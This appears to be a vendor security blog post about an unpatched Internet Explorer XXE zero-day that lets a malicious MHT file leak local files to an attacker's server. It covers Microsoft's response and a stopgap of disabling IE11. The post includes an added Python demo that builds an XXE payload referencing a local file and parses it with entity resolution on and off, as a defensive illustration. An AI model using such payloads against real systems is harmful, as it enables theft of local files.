A new XML External Entity (XXE) vulnerability in Internet Explorer has been disclosed. This zero-day lets an attacker steal local files from a victim's machine if the victim opens a malicious file. Worse, no patch is available, and a fix is unlikely to arrive before next month's Patch Tuesday.
A proof of concept was published earlier this week by researcher John Page. It shows how the flaw can be exploited with an XML External Entity (XXE) attack: XML processed by a vulnerable parser is made to resolve an external entity that points at a file on the local disk. In this case the XML block is embedded in an MHT file, and when the user opens that file the contents of the targeted local files are sent from the user's computer to the attacker's web server.
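To make the mechanism concrete, the block below is an added example, not part of the original post and not John Page's MHT proof of concept: it uses Python's standard xml.sax parser to show what an external entity does in any parser that follows external entities. A constructed "secret" file stands in for the victim's local file, the hypothetical <leak> element marks where the entity is referenced, and the same payload is parsed twice, once with external entity resolution enabled (the vulnerable configuration) and once with it disabled (xml.sax's hardened default). The IE attack takes the same idea one step further by routing the substituted file contents to the attacker's web server; here they simply end up in the parsed document.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class LeakCollector(ContentHandler):
    """SAX handler that records the text that ends up inside <leak>."""

    def __init__(self):
        super().__init__()
        self.in_leak = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "leak":
            self.in_leak = True

    def endElement(self, name):
        if name == "leak":
            self.in_leak = False

    def characters(self, content):
        if self.in_leak:
            self.chunks.append(content)


def build_payload(local_path):
    """Classic XXE payload: the internal DTD subset declares an external
    general entity whose SYSTEM identifier is a local file, and the document
    body references that entity so its contents are spliced into <leak>.
    (<doc>, <leak> and the entity name are hypothetical.)"""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE doc [\n"
        f'  <!ENTITY xxe SYSTEM "{local_path}">\n'
        "]>\n"
        "<doc><leak>&xxe;</leak></doc>\n"
    ).encode()


def parse_payload(payload, follow_external_entities):
    """Parse with xml.sax. follow_external_entities=True reproduces a parser
    that resolves external entities (the vulnerable configuration);
    False is the standard library's hardened default."""
    handler = LeakCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, follow_external_entities)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload))
    return "".join(handler.chunks)


def xxe_demo():
    """Writes a constructed 'secret' file, feeds the payload to both parser
    configurations and returns (leaked_text, hardened_text)."""
    secret = "db_password=hunter2\n"  # constructed sample file content
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(secret)
    try:
        payload = build_payload(path)
        leaked = parse_payload(payload, follow_external_entities=True)
        hardened = parse_payload(payload, follow_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = xxe_demo()
    print("entity-resolving parser leaked:", repr(leaked))
    print("hardened parser produced:     ", repr(hardened))
```

Run it as a script to see the two results side by side. The takeaway for anyone who parses untrusted XML is the feature flag: leave feature_external_ges off (and refuse DTDs altogether where you can), because the payload is plain, well-formed XML that nothing in the document itself flags as hostile.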
Microsoft's response to the report is, unfortunately, not very encouraging. After the vulnerability was reported near the end of March, the following reply was given:
«We determined that a fix for this issue will be considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case.»
Hopefully this still means that the May Patch Tuesday will include a fix. In the meantime, we've created a custom color-coded report that identifies which devices in your network have Internet Explorer enabled.
Since no fix is available yet, we've also shared a script that disables Internet Explorer 11 on Windows 10 machines as a stopgap. The script can be deployed with the Lansweeper deployment module to ensure Internet Explorer 11 can't be used. On Windows 10, Internet Explorer 11 is an optional Windows feature, so it can be turned off per machine (for example with PowerShell's Disable-WindowsOptionalFeature or DISM) rather than uninstalled; note that this removes the browser itself but not the MSHTML rendering engine that other Windows components use, so treat it as a temporary mitigation until a patch ships.